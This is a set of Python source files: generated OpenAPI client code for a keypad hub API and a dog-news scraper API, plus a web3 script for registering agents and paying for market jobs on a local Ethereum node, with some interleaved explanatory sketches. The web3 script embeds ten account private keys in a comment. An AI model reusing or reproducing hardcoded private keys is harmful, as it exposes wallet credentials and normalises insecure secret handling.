data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: InlineResponse200
"""
kwargs['_return_http_data_only'] = True
return self.root_get_with_http_info(**kwargs) # noqa: E501
def root_get_with_http_info(self, **kwargs): # noqa: E501
"""Get keypads and groups (and scenes in API schema 4 or later) # noqa: E501
Gets all keypads and groups in the installation. Added in hub firmware version 1.14 (API schema 3). Scenes are also returned in API schema 4. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.root_get_with_http_info(async_req=True)
>>> result = thread.get()
:param basicauthuser: Username to use in place of username in basic authentication header. For a secure installation, this value is ignored but still must be supplied unless a basic authentication header is sent with the request.
:type basicauthuser: str
:param basicauthpassword: Password to use in place of password in basic authentication header. For a secure installation, this should be an oauth token for a user with access to the installation. If a basic authentication header is sent, this parameter is ignored. If no basic authentication header is sent, this parameter as well as the basicauthuser parameter must be supplied if the hub is a member of a secure installation.
:type basicauthpassword: str
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without the status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(InlineResponse200, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'basicauthuser',
'basicauthpassword'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method root_get" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'basicauthuser' in local_var_params and local_var_params['basicauthuser'] is not None: # noqa: E501
query_params.append(('basicauthuser', local_var_params['basicauthuser'])) # noqa: E501
if 'basicauthpassword' in local_var_params and local_var_params['basicauthpassword'] is not None: # noqa: E501
query_params.append(('basicauthpassword', local_var_params['basicauthpassword'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
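The `>>> thread = api.xxx(async_req=True)` examples in the docstrings above all follow one contract: the call returns a handle whose `.get()` blocks for the result. A minimal sketch of that pattern, using a stubbed function in place of the real HTTP request (`fake_call` and the pool size are illustrative assumptions, not part of this client):

```python
# Sketch of the async_req contract described in the docstrings: the call
# returns an AsyncResult-style handle, and .get() blocks until the work
# finishes. fake_call stands in for the real HTTP request (illustrative only).
from multiprocessing.pool import ThreadPool

def fake_call():
    # pretend this performed the GET and returned (body, status_code)
    return ("InlineResponse200 payload", 200)

pool = ThreadPool(1)
thread = pool.apply_async(fake_call)   # like api.root_get(async_req=True)
result = thread.get()                  # blocks, like the >>> examples show
pool.close()
pool.join()
```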
# --- dao/py/main.py (akolonin/singnet) ---
import json
from web3 import Web3, HTTPProvider, IPCProvider
web3 = Web3(HTTPProvider('http://localhost:8545'))
def getAddressByName(addresses,name):
for key, value in addresses.items():
if key==name:
return value
def parseAbi(data):
for key, value in data.items():
if key=='abi':
return value
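The two helpers above just pick keys out of Truffle-style JSON artifacts. A runnable sketch of the same lookups against inline sample data instead of the `../build/contracts/*.json` files (the sample dicts here are made up for illustration):

```python
import json

def get_address_by_name(addresses, name):
    # same lookup as getAddressByName above, written with dict.get
    return addresses.get(name)

def parse_abi(artifact):
    # same extraction as parseAbi above
    return artifact.get('abi')

# Inline stand-ins for addresses.json and a Truffle build artifact.
sample_addresses = json.loads('{"AgentRegistry": "0xbea2", "Agent": "0x45f4"}')
sample_artifact = {'contractName': 'Agent', 'abi': [{'type': 'constructor'}]}

registry_address = get_address_by_name(sample_addresses, 'AgentRegistry')
agent_abi = parse_abi(sample_artifact)
```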
'''
Available Accounts
==================
(0) 0xbdd3c856d398439524a59f9a0e87958016f246e0
(1) 0x6ace9609e9fc2c52c382c5be6fffd1c9750d3b77
(2) 0x76b9faebe2952cc78a8fe29d7a94109b334c15de
(3) 0x2a7f1faa1b9a2fb7e09a5939f6380cfabbf13f30
(4) 0x52a6285b4a8f81640832300417db57e465e87bed
(5) 0xe93b526ecf72116cb4be7aedd6430f199d7f159d
(6) 0x887b15e382a1acb3b6574f832ed0dec39ce54002
(7) 0x11d92eaa00789811c7d1d195c6b98074400efed2
(8) 0x345f39d894802d15a84173f571652eefa7528eb6
(9) 0xb8cddf7d2c78f52b7488963d82a369915acd3f41
Private Keys
==================
(0) 64b0db5ae93afa13b45a5f887f33d9af17bcb30050b8a41ae7468db4c6ba3349
(1) 66922450e3491b1079e464b722934fbb5c9b7c41da9eb8232c8680d26c9d9599
(2) 8bfa373ced7ea151cee363c0465a87c6bc3304a224b74e587362036984505fe2
(3) e1628c93556d28185807b91a3fb25f44ac3652dfd7b9bf778702b4b7ca074ae0
(4) a916a92d812543800d436902976e4e7a9315bdce7118c585844486d86c912de5
(5) 5f9f683bf47a5fe2bb7e425a5ef15636d12a8ae89b550689928421c913a2def8
(6) f2b624c4d03e2ebe069af90f22e67b5c838dd5c32351b868c275d46d980d93fe
(7) 5cd859497f25339a71aeb9cb4d84d2188cb4edfe30aa08ffe00babc4ae9dc1a4
(8) 3ad759b4f915309211f2fdc6911911f34880caf2564933c21dd7048ce2625fbd
(9) e424215eb29e5484ada1301fabdfd61aed2c688364f7988e6229720628f9743d
Ownable: 0x6c388304d3c7fc40c1a2102cad53047f65bd7683
Escrow: 0x6394dbb6cf1fbc5985eb799966e43e26cb47103e
AgentRegistry: 0xbea2b908a51e8cc5f76238cf022d0d5be1c3c5ac
Agent: 0x45f4f554434a3157ddfb38d17b2b9d4504a8a045
FixedSupplyToken: 0x709c20a1f3df097d493d7b96f31478cb8ab288b7
OrganizationFactory: 0x311584fe6518fa0367e6a0d1e56b3c9f09035b35
AgentFactory: 0x8b6d3d6db2333e6781fa4918926dd742152976c8
Organization: 0x54c49a1445d827d0336158f406d0349e9b00cf4f
SingularityNetToken: 0x9f3e6393774fdec4f78186f04f70ca6c28f92d25
'''
#payloads
payload = {'from': web3.eth.coinbase, 'gas': 1500000, 'gasPrice':30000000000000}
#ABI(s)
agentRegistryAbi = parseAbi(json.loads(open('../build/contracts/AgentRegistry.json','r').read()))
agentFactoryAbi = parseAbi(json.loads(open('../build/contracts/AgentFactory.json','r').read()))
marketJobAbi = parseAbi(json.loads(open('../build/contracts/MarketJob.json','r').read()))
agentAbi = parseAbi(json.loads(open('../build/contracts/Agent.json','r').read()))
crowdsaleAbi = parseAbi(json.loads(open('../build/contracts/AgiCrowdsale.json','r').read()))
#addresses
agentRegistryAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'AgentRegistry')
agentFactoryAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'AgentFactory')
marketJobAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'MarketJob')
agentAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'Agent')
crowdsaleAddress = getAddressByName(json.loads(open('../addresses.json','r').read()),'AgiCrowdsale')
#Contracts
agentRegistryContract = web3.eth.contract(abi = agentRegistryAbi, address=agentRegistryAddress)
agentFactoryContract = web3.eth.contract(abi = agentFactoryAbi, address=agentFactoryAddress)
marketJobBytecode = json.loads(open('../build/contracts/MarketJob.json','r').read())['bytecode']
marketJobContract = web3.eth.contract(abi = marketJobAbi, address=marketJobAddress, bytecode=marketJobBytecode)
agentContract = web3.eth.contract(abi = agentAbi, address=agentAddress)
crowdsaleContract = web3.eth.contract(abi = crowdsaleAbi, address=crowdsaleAddress)
def joinNetwork():
return agentFactoryContract.transact(payload).create()
def advertiseService(service,agent):
return agentRegistryContract.transact(payload).addAgent(service,agent)
def findServiceProviders(service):
return agentRegistryContract.call(payload).getAgentsWithService(service)
def getAgentsById(id):
return agentRegistryContract.call(payload).getAgent(id)
def createMarketJob(agents,amounts,payer,firstService,lastService):
return marketJobContract.deploy(transaction={'from': web3.eth.accounts[8],'value': web3.toWei(1, 'ether')},args=(agents,amounts,payer,firstService,lastService))
def setJobCompleted():
return marketJobContract.transact(payload).setJobCompleted()
def payAgent(agentAccounts):
return marketJobContract.transact({'from': agentAccounts[0]}).withdraw()
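`createMarketJob` funds the deployment with `web3.toWei(1, 'ether')`, and the commented rewards below use `web3.toWei(0.5, 'ether')`. The unit arithmetic behind those calls can be reproduced in plain Python with no node running (the denomination table follows the standard Ethereum units):

```python
from decimal import Decimal

# Standard Ethereum denominations: wei per unit.
WEI_PER_UNIT = {'wei': 1, 'gwei': 10**9, 'ether': 10**18}

def to_wei(amount, unit):
    # Decimal avoids float rounding for values like 0.5 ether.
    return int(Decimal(str(amount)) * WEI_PER_UNIT[unit])

one_ether = to_wei(1, 'ether')
half_ether = to_wei(0.5, 'ether')
```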
# assign an integer for each service
# wordSenseDisambiguation = 0,
# textSummarization = 1
# # Here I'm joining the network and putting in myself the address on the blockchain
# myself1 = joinNetwork()
# print("myself_1 {0}".format(myself1))
# myself2 = joinNetwork()
# print("myself_2 {0}".format(myself2))
# #TODO: add event watch AgentAdded
# #Add an agent (address) and its service (id, unit, pricePerUnit) to the registry
# advertiseService(0, 0, 20, web3.eth.accounts[1])
# #Create a new market with two agents
# agentAccounts = [web3.eth.accounts[4],web3.eth.accounts[5]]
# rewardsForServices = [web3.toWei(0.5, 'ether'),web3.toWei(0.5, 'ether')]
# payer = web3.eth.accounts[2]
# marketJob = createMarketJob(agentAccounts,rewardsForServices,payer,"0","1")
# print("market_job {0}".format(marketJob))
# #Complete all jobs
# setJobCompleted()
# #Let agent be payed for his service(s)
# payAgent(agentAccounts)
#Here I'm registering a new agent for a given service
'''print("\n\nadvertize service\n")
print(advertiseService(0,myself))
print(advertiseService(0,test_agent))
print(advertiseService(72182,test_agent))
## Here I'm printing
print("\n\nfind service providers for 0\n")
print(getAgentsById(findServiceProviders(0)[0]))
print(getAgentsById(findServiceProviders(0)[1]))
print("\n\nfind service providers for 72182\n")
print(findServiceProviders(72182)[0])
test_provider_address = findServiceProviders(72182)[0]
test_provider = getAgentsById(test_provider_address)'''
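The commented walkthrough above hardcodes service ids (`wordSenseDisambiguation = 0`, `textSummarization = 1`). A small lookup keeps those magic numbers in one place; the mapping itself is taken from the comments, nothing else is assumed:

```python
# Service-name -> id mapping from the comments above.
SERVICES = {
    'wordSenseDisambiguation': 0,
    'textSummarization': 1,
}

def service_id(name):
    # Fail loudly on unknown services instead of advertising a bogus id.
    if name not in SERVICES:
        raise KeyError('unknown service: %s' % name)
    return SERVICES[name]

# e.g. advertiseService(service_id('textSummarization'), myself)
```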
# --- openapi_client/api/fetchs_api.py (osuka/dognews-scraper) ---
"""
Dognews Server API
Dognews Server client API # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from openapi_client.api_client import ApiClient, Endpoint as _Endpoint
from openapi_client.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from openapi_client.model.fetch import Fetch
from openapi_client.model.paginated_fetch_list import PaginatedFetchList
from openapi_client.model.patched_fetch import PatchedFetch
class FetchsApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def __fetchs_create(
self,
**kwargs
):
"""fetchs_create # noqa: E501
Fetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_update/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_create(async_req=True)
>>> result = thread.get()
Keyword Args:
fetch (Fetch): [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Fetch
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.fetchs_create = _Endpoint(
settings={
'response_type': (Fetch,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs',
'operation_id': 'fetchs_create',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'fetch',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'fetch':
(Fetch,),
},
'attribute_map': {
},
'location_map': {
'fetch': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded',
'multipart/form-data'
]
},
api_client=api_client,
callable=__fetchs_create
)
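The generated pattern above wires a private function plus an `_Endpoint` object into a callable attribute. A stripped-down sketch of that wiring (the `Endpoint` class and `Api` here are illustrative stand-ins, not the real `openapi_client` classes):

```python
class Endpoint:
    # Minimal stand-in: stores endpoint settings and delegates calls to a
    # bound function, mirroring how _Endpoint wraps __fetchs_create above.
    def __init__(self, settings, fn):
        self.settings = settings
        self._fn = fn

    def __call__(self, *args, **kwargs):
        return self._fn(*args, **kwargs)

class Api:
    def __init__(self):
        def _create(**kwargs):
            # stand-in for the real call_with_http_info dispatch
            return {'op': 'fetchs_create', 'kwargs': kwargs}
        self.fetchs_create = Endpoint({'http_method': 'POST'}, _create)

api = Api()
resp = api.fetchs_create(fetch={'submission': 1})
```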
def __fetchs_destroy(
self,
submission,
**kwargs
):
"""fetchs_destroy # noqa: E501
Fetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_update/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_destroy(submission, async_req=True)
>>> result = thread.get()
Args:
submission (int): A unique value identifying this fetch.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
None
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['submission'] = \
submission
return self.call_with_http_info(**kwargs)
self.fetchs_destroy = _Endpoint(
settings={
'response_type': None,
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs/{submission}',
'operation_id': 'fetchs_destroy',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'submission',
],
'required': [
'submission',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'submission':
(int,),
},
'attribute_map': {
'submission': 'submission',
},
'location_map': {
'submission': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [],
'content_type': [],
},
api_client=api_client,
callable=__fetchs_destroy
)
def __fetchs_list(
self,
**kwargs
):
"""fetchs_list # noqa: E501
Fetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_update/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user. Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_list(async_req=True)
>>> result = thread.get()
Keyword Args:
limit (int): Number of results to return per page. [optional]
offset (int): The initial index from which to return the results. [optional]
ordering (str): Which field to use when ordering the results. [optional]
status (str): [optional]
_return_http_data_only (bool): return the response data only,
without status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
PaginatedFetchList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.fetchs_list = _Endpoint(
settings={
'response_type': (PaginatedFetchList,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs',
'operation_id': 'fetchs_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'limit',
'offset',
'ordering',
'status',
],
'required': [],
'nullable': [
],
'enum': [
'status',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('status',): {
"FETCHED": "fetched",
"PENDING": "pending",
"REJ_ERROR": "rej_error",
"REJ_FETCH": "rej_fetch"
},
},
'openapi_types': {
'limit':
(int,),
'offset':
(int,),
'ordering':
(str,),
'status':
(str,),
},
'attribute_map': {
'limit': 'limit',
'offset': 'offset',
'ordering': 'ordering',
'status': 'status',
},
'location_map': {
'limit': 'query',
'offset': 'query',
'ordering': 'query',
'status': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__fetchs_list
)
def __fetchs_partial_update(
self,
submission,
**kwargs
):
"""fetchs_partial_update # noqa: E501
Fetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_update/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user. Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_partial_update(submission, async_req=True)
>>> result = thread.get()
Args:
submission (int): A unique value identifying this fetch.
Keyword Args:
patched_fetch (PatchedFetch): [optional]
_return_http_data_only (bool): return the response data only,
without status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Fetch
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['submission'] = \
submission
return self.call_with_http_info(**kwargs)
self.fetchs_partial_update = _Endpoint(
settings={
'response_type': (Fetch,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs/{submission}',
'operation_id': 'fetchs_partial_update',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'submission',
'patched_fetch',
],
'required': [
'submission',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'submission':
(int,),
'patched_fetch':
(PatchedFetch,),
},
'attribute_map': {
'submission': 'submission',
},
'location_map': {
'submission': 'path',
'patched_fetch': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded',
'multipart/form-data'
]
},
api_client=api_client,
callable=__fetchs_partial_update
)
def __fetchs_retrieve(
self,
submission,
**kwargs
):
"""fetchs_retrieve # noqa: E501
Fetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_update/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user. Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_retrieve(submission, async_req=True)
>>> result = thread.get()
Args:
submission (int): A unique value identifying this fetch.
Keyword Args:
_return_http_data_only (bool): return the response data only,
without status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Fetch
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['submission'] = \
submission
return self.call_with_http_info(**kwargs)
self.fetchs_retrieve = _Endpoint(
settings={
'response_type': (Fetch,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs/{submission}',
'operation_id': 'fetchs_retrieve',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'submission',
],
'required': [
'submission',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'submission':
(int,),
},
'attribute_map': {
'submission': 'submission',
},
'location_map': {
'submission': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__fetchs_retrieve
)
def __fetchs_update(
self,
submission,
**kwargs
):
"""fetchs_update # noqa: E501
Fetching results attached to a submission **Permission restrictions:** + `IsAuthenticated`: *Rejects all operations if the user is not authenticated* + `IsOwnerOrStaff`: *Blocks update/partial_update/destroy if: * the user is NOT in the staff group * AND if the model has a property called 'owner' and its value differs from the request user. Everything else is allowed* + `DjangoModelPermissions`: *The request is authenticated using `django.contrib.auth` permissions. See: https://docs.djangoproject.com/en/dev/topics/auth/#permissions It ensures that the user is authenticated, and has the appropriate `add`/`change`/`delete` permissions on the model. This permission can only be applied against view classes that provide a `.queryset` attribute.* # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetchs_update(submission, async_req=True)
>>> result = thread.get()
Args:
submission (int): A unique value identifying this fetch.
Keyword Args:
fetch (Fetch): [optional]
_return_http_data_only (bool): return the response data only,
without status code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Fetch
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['submission'] = \
submission
return self.call_with_http_info(**kwargs)
self.fetchs_update = _Endpoint(
settings={
'response_type': (Fetch,),
'auth': [
'basicAuth',
'cookieAuth',
'jwtAuth',
'tokenAuth'
],
'endpoint_path': '/fetchs/{submission}',
'operation_id': 'fetchs_update',
'http_method': 'PUT',
'servers': None,
},
params_map={
'all': [
'submission',
'fetch',
],
'required': [
'submission',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'submission':
(int,),
'fetch':
(Fetch,),
},
'attribute_map': {
'submission': 'submission',
},
'location_map': {
'submission': 'path',
'fetch': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/x-www-form-urlencoded',
'multipart/form-data'
]
},
api_client=api_client,
callable=__fetchs_update
)
